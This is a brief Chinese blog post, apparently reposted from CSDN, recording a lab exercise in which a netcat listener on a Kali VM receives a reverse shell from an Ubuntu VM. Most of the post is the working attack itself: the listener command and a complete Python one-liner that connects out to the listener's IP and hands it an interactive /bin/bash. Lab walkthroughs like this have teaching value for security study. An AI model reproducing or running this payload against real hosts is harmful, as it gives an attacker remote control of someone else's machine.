记一次nc反弹shell-爱代码爱编程
在kali虚拟机上用nc监听端口7777
nc -lvp 7777
在ubuntu虚拟机上用python脚本去反向连接
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('?.?.?.?',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
其中s.connect(('?.?.?.?',7777))
中的ip地址为kali虚拟机的ip地址,可以用ifconfig查看。在ubuntu上虚拟机上输入上面的命令:
然后切换到kali虚拟机界面,可以看到,命令行从原来红色的root@kali变成了绿色的。说明反弹shell成功了。其中被红色涂掉的是ip地址,可以不用管。
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。 本文链接: https://blog.csdn.net/u013648063/article/details/110394687